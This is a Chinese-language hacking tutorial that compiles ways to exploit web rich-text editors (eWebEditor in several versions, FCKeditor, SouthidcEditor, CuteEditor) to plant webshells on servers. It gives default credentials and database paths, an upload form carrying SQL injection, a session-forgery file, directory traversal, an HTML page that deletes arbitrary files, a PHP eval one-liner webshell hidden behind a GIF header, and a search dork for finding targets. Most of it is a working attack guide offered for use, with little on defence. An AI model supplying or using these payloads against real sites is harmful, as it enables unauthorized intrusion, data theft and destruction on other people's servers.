?

?

常見的一些編輯器:ewebeditor ewebeditornet fckeditoreditor southidceditor SouthidcEditor bigcneditor

其實如果大家多關注編輯器的話,會有驚人的發現,尤其是jsp,php版的,一個webshell基本上就是一臺服務器啊~~~

一:首先說說最近不斷爆洞的ewebeditor

(一)ASP版

/webeditor/dialog/about.htm 查看版本

1:默認管理后臺:

http://www.test.com/ewebeditor/admin_login.asp

后臺如果能進入:

可點擊樣式管理:

standard 拷貝一份(直接修改改不了)

在拷貝的一份里加入圖片類型( asa aaspsp ) 然后點預覽

在編輯器里點設計 然后直接上傳asa大馬.

上傳后 在代碼里可以看到馬的位置!

(原理:因為在iis里 網站的屬性里 應用程序配置一項 asa擴展名還是用asp.dll來解析的,asp也是 還有 cer cdx )

在cer cdx asa的被刪掉 那么馬兒就找不到 映射不過去.

可以在拷貝過后的樣式 圖片類型里加入 aaspsp 然后在上傳 直接就可以上傳asp文件


2:下載默認數據庫

www.test.com/ewebeditor/db/ewebeditor.mdb

然后分析數據庫

webeditor_system(1) 就可以看到用戶名和密碼 如果破解不出來

可以在webeditor_style(14 樣式表里

主要看允許上傳文件的擴展名(s-fileext s_ingeext)

看到一個小黑客曾經搞過 多了asa aaspsp

可以用他來利用!(后臺找不到的情況下也可以用此方法)

可以構造語句:

比如 ID=46 s-name =standard1

構造 代碼: ewebeditor.asp?id=content&style=standard

ID和和樣式名改過后

ewebeditor.asp?id=46&style=standard1


然后就是進入編輯器 上傳asa 或者asp的 得到webshell

前面的1跟2說的是asp版的ewebeditor,其他如php,jsp跟asp的差不多,這里不多說.

針對這種方法可能出現的問題:

(1)．使用默認用戶名和密碼無法登錄。
請試試直接下載db目錄下的ewebeditor.mdb文件，用戶名和密碼在eWebEditor_System表中，經過了md5加密，如果無法下載或者無法****，那就當自己的運氣不好了。
(2)．加了asa類型后發現還是無法上傳。
應該是站長懂點代碼，自己修改了Upload.asp文件，但是沒有關系，按照常人的思維習慣，往往會直接在sAllowExt = Replace(UCase(sAllowExt), "ASP", "")一句上修改，我就看見過一個站長是這樣修改的：
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
猛一看什么都過濾了，但是我們只要在上傳類型中增加“aaspsp”，就可以直接上傳asp文件了。呵呵，是不是天才的想法？“aaspsp”過濾了“asp”字符后，反而變成了“asp”！順便告訴大家一個秘密，其實動網論壇7.0 sp2中也可以利用類似的方法繞過對擴展名的過濾。
(3)．上傳了asp文件后，卻發現該目錄沒有運行腳本的權限。
呵呵，真是好笨啊，上傳類型可以改，上傳路徑不是也可以修改的嗎？

(4)．已經使用了第2點中的方法，但是asp類型還是無法上傳。
看來站長肯定是一個寫asp的高手，但是我們還有最后一招來對付他：看到“遠程類型”了嗎？eWebEditor能夠設定自動保存遠程文件的類型，我們可以加入asp類型。但是如何才能讓遠程訪問的asp文件能夠以源碼形式保存呢？方法是很多的，最簡單的方法是將IIS中的“應用文件映射”中的“asp”刪除。

漏洞原理
漏洞的利用原理很簡單，請看Upload.asp文件：
任何情況下都不允許上傳asp腳本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
因為eWebEditor僅僅過濾了ASP文件。記得我第一次使用eWebEditor時就在納悶：既然作者已經知道asp文件需要過濾，為什么不同時過濾asa、cer等文件呢？也許這就是對免費用戶不負責任的表現吧！

3.eWebEditor session欺騙漏洞

eWebEditor在線編輯器

漏洞文件:Admin_Private.asp

漏洞語句:<%

If Session("eWebEditor_User") = "" Then

Response.Redirect "admin_login.asp"

Response.End

End If

只判斷了session，沒有判斷cookies和路徑的驗證問題。

漏洞利用:

新建一個h4x0r.asp內容如下:

<%Session("eWebEditor_User") = "11111111"%>

訪問h4x0r.asp，再訪問后臺任何文件，for example:Admin_Default.asp

漏洞影響:虛擬主機的克星.

4.ewebeditor asp版 2.1.6 上傳漏洞

<H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序</H1><br>

<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">

<input type=file name=uploadfile size=100><br><br>

<input type=submit value=Fuck>

</form>

http://127.1/e/upload.asp

上傳時修改此處上傳地址。。。

如果你是上傳的asp文件則成功后的地址為：

http://127.1/e/uploadfile/xxxxxxxxxx.asp

5.ewebeditor遍歷路徑漏洞
Ewebeditor為非常常見的網站核心程序,
默認數據庫為 /db/ewebeditor.mdb 默認路徑admin_login.asp 默認管理員admin密碼admin(admin888)

ewebedit進入后臺添加樣式.得到webshell很容易. 有時候很不幸.管理員把數據庫改為只讀權限.

但是ewebeditor后臺有個小小的缺陷. 可以歷遍整個網站目錄. 當然.數據庫為只讀的時候一樣可以利用.

上傳文件管理---選擇樣式目錄(隨便選一個目錄)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整個網站文件了

6.eweb2.7版本以下又一個注入

首先看代碼(ewebeditor.asp)：
ub InitPara()
' 取全屏標志
sFullScreen = Trim(Request.QueryString("fullscreen"))
' 取對應的內容ID
sContentID = Trim(Request.QueryString("id"))
If sContentID = "" Then ShowErr "請傳入調用參數ID，即隱藏的內容表單項ID！"

' 取樣式初始值
sStyleName = Trim(Request.QueryString("style"))
If sStyleName = "" Then sStyleName = "standard"

sSql = "select * from ewebeditor_style where s_name='" & sStyleName & "'"
oRs.Open sSql, oConn, 0, 1
If Not oRs.Eof Then
sStyleID = oRs("S_ID")
sStyleName = oRs("S_Name")
sStyleDir = oRs("S_Dir")
sStyleCSS = oRs("S_CSS")
sStyleUploadDir = oRs("S_UploadDir")
nStateFlag = oRs("S_StateFlag")
sDetectFromWord = oRs("S_DetectFromWord")
sInitMode = oRs("S_InitMode")
sBaseUrl = oRs("S_BaseUrl")

sStyleUploadDir = Replace(sStyleUploadDir, "\", "/")
If Right(sStyleUploadDir, 1) <> "/" Then
sStyleUploadDir = sStyleUploadDir & "/"
End If
Else
ShowErr "無效的樣式Style參數傳入，如果要使用默認值，請留空！"
End If
oRs.Close
關鍵的是這兩句：
sStyleName = Trim(Request.QueryString("style"))
If sStyleName = "" Then sStyleName = "standard"

sSql = "select * from ewebeditor_style where s_name='" & sStyleName & "'"
很明顯的是style參數沒有足夠的過濾，如果我們自己給這個地方賦值的話，程序會報錯的，



但接下來的一句還是讓我們有可乘之機，If sStyleName = "" Then sStyleName = "standard"保留默認的還是會帶入語句執行，加個單引號就報錯了，如圖2.[local]1[/local]
我試了好幾款工具，發現只有pangolin可以注入，啊D只能發現注入不能繼續猜解。
eweb默認的管理員表是：ewebeditor_system
這個表下的默認兩個列名為:sys_UserName和sys_userpass
需要手動添加，

7.ewebeditor2.8最終版刪除任意文件漏洞

這個漏洞可以很雞肋，也可以很致命，關鍵看你怎么利用！

此漏洞存在于ExampleNewsSystem目錄下的delete.asp文件中，這是ewebeditor的測試頁面，無須登陸可以直接進入，看這些代碼：

' 把帶"|"的字符串轉為數組
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, "|")
' 刪除新聞相關的文件，從文件夾中
Dim i
For i = 0 To UBound(aSavePathFileName)
' 按路徑文件名刪除文件
Call DoDelFile(aSavePathFileName(i))
Next

而aSavePathFileName是前面從數據庫取出來的：

sSavePathFileName = oRs("D_SavePathFileName")

看看D_SavePathFileName是怎么添加到數據庫里的，在addsave.asp(modifysave.asp)里：

sSavePathFileName = GetSafeStr(Request.Form("d_savepathfilename"))
...
oRs("D_SavePathFileName") = sSavePathFileName

居然過濾了，是GetSafeStr函數，再看看這個函數，在Startup.asp里：

Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), "'", ""), Chr(34), ""), ";", "")
End Function

無語，這不是過濾字符型注入的函數么？放這里什么用也沒有啊！既然路徑沒有過濾，那就可以直接定義了，構造一個提交頁面，其中d_savepathfilename自己任意賦值(要刪除多個文件，用|隔開即可)。試試../../eWebEditor.asp，提交后刪除該新聞，于是主目錄下的eWebEditor.asp不見了！

下面給出利用的htm：
<HTML><HEAD><TITLE>eWebEditor刪除文件 by:oldjun(http://www.oldjun.com)</TITLE>
<style>body,p,td,input {font-size:9pt}</style>
</HEAD><BODY><a href='list.asp'>新聞列表</a> | <a href='add.asp'>增加新聞</a>

<b>增加新聞</b>

<form action="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"
method="post" name="myform">
<input type=hidden name=d_originalfilename>
<input type=hidden name=d_savefilename>
<table cellspacing=3 align=center>
<tr><td>要刪的文件(相對路徑就可以了)：</td>
<td><input type="text" name="d_savepathfilename" value="" size="90"></td>
</tr>
<tr><td>新聞標題(隨便填)：</td>
<td><input type="text" name="d_title" value="" size="90"></td>
</tr>
<tr><td>標題圖片：</td>
<td><select name="d_picture" size=1><option value=''>無</option></select>
當編輯區有插入圖片時，將自動填充此下拉框</td>
</tr>
<tr><td>新聞內容(隨便填)：</td>
<td><textarea name="d_content"></textarea></td>
</tr>
</table>

<input type=submit name=btnSubmit value=" 提 交 ">
<input type=reset name=btnReset value=" 重 填 ">
</form>
</BODY></HTML>

(二)ASPX版：

受影響文件：eWebEditorNet/upload.aspx

利用方法：添好本地的cer的Shell文件。在瀏攬器輸入javascript:lbtnUpload.click();就能得到shell

嘿嘿....繞過了限制......成功的上傳了ASPX文件....

文件默認的上傳后保存的地址是eWebEditorNet/UploadFile/現在來看看是否上傳成功.....

(三)PHP版

關于eWebEditor 漏洞php版本的和asp的一樣。有目錄瀏覽。和編輯擴展名。重點在于雖然支持了php格式但上傳還是上傳不了。不過利用織夢的gif89a漏洞倒可以實現php一句話上傳，然后再上傳webshell。

備注：織夢的gif89a漏洞，準確來說應該是DEDECMS中所用的php版的FCKeditor存在上傳漏洞，gif89a文件頭欺騙。DEDECMS中在上傳拖上沒有對picSubmit進行任何處理。但是卻不能直接上傳php馬。因為會識別。使用修改過的php小馬。

gif89a

<?php

phpinfo();

?>

RFI

gif89a

<?php

eval($_POST[c]);

?>

利用gif89a進行了欺騙。現在上傳就可以成功了.然后有php一句話客戶端連接.

(四)JSP版

上傳漏洞

影響版本：漏洞存在于ewebeditor jsp版 1.4以下版本，漏洞有兩個版本。

原理：第一個是使用savefile.jsp來進行 文件上傳 操作的，從代碼中可以看出，程序并沒做任何上傳過濾，這樣我們就可以直接上傳一個JSPShell了。另一個版本可能是被人修改過，把代碼轉成了servlet，不能看到代碼，但是利用方法卻大同小異。

利用方法：我們先找一個1.4版本以下的ewebeditor JSP上傳頁面，選擇好一個JSPShell。這個ewebeditor是沒有提交按鈕的，所以這里涉及到一個小技巧，就是在上傳的對話框中敲下回車，大約過半分鐘，就可以查看網頁的源文件來尋找我們的Webshell了。

這個JSP和PHP一樣,如果系統權限沒有特意去設置的話,默認我們得到webshell是system的權限,那么...^_^

二:ewebeditornet 漏洞利用

默認上傳地址:

www.test.com/ewebeditornet/upload.aspx


可以直接上傳一個cer的木馬

在無法上傳的情況下

可以地址欄構造以下代碼: javascript:lbtnUpload.click();

然后查看源代碼:

找到uploadsave 找到地址

默認傳到uploadfile這個文件夾里

(漏洞修補: 可以在iss里直接把upload文件夾的執行權限選擇無. )

三:fckeditor 漏洞利用

http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/
就把文件名字段改成NEWfile 選擇文件名可定義
上傳過后在/userfiles/image/找文件

上傳任意文件:

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

根據網站所使用不同語言自己改這個地址.

FCKeditor的JSP版漏洞

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
上傳shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

四：southidceditor

1.

http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb

http://www.xhkjit.com/admin/southidceditor/popup.asp

http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp

2.southidceditor存在一個可以抓包上傳的漏洞

Google:inurl:(admin/SouthidcEditor/PopUp.asp)

nc抓包自己玩玩吧.


五：bigcneditor(這個我沒有找到具體的漏洞,網上的文章也都比較不負責任,誰知道的請告訴我下,謝謝)

這個頁不多說了

原理都差不多！

防范方法很簡單就不多講了，

六：CuteEditor編輯器通殺漏洞

CuteEditor編輯器是.NET下最常用的一個編輯器..
十分的強大..也許是因為他太強了 HEHE ..
我們隨便找到一個裝有此編輯器的網站 點擊插入圖片 FLASH 影音文件 什么的都可以出來一個對話框.
在這個對話框里可以游覽用戶所上傳的數據還有目錄..郁悶的是居然可以新建..移動..修改..
在官網上甚至連刪除都弄出來了..呵呵.. 我們這次主要是利用2003服務器的特性來進行利用..
大家都知道在2003的IIS環境下 如果你建一個 XXX.asp 文件夾的話 里面不管放什么其他類型的文件
在IIS里都會通過文件夾名的類型來解析 也就是說你傳一個JPG的東西到 XXX.ASP下也會以ASP腳本
來進行解析..我們這里就利用他這一特性...首先我們隨便找一個編輯器 然后選擇插入圖片吧(如圖1)..插入其他的
東西都行..只要能新建文件目錄..或者可以移動目錄..

看這里就有新建文件夾等等一些操作的按鈕我們新建一個..如果新建不能用可以試試移動文件夾把以有的文件夾名改成 XXX.asp形式..


好了.我們新建一個 www.asp 文件夾.


確定..我們的文件夾就建好了..然后點擊進入該文件夾 (

然后到了最關鍵的...我們上傳文件..
用插入圖片是上傳不了的..他會檢測是不是正常的圖片..
可以試試 插入 FLASH
或者插入 視頻 音樂文件..我們這里就插入視頻.. 然后直接把 我們要傳上去的馬后綴改為 .avi形式

然后進入我們剛才新建的那個目錄 然后上傳 .. 文件就上去了

?

本文由 殘劍 進行整理編輯，轉載請注明出處。

?

各種在線編輯器漏洞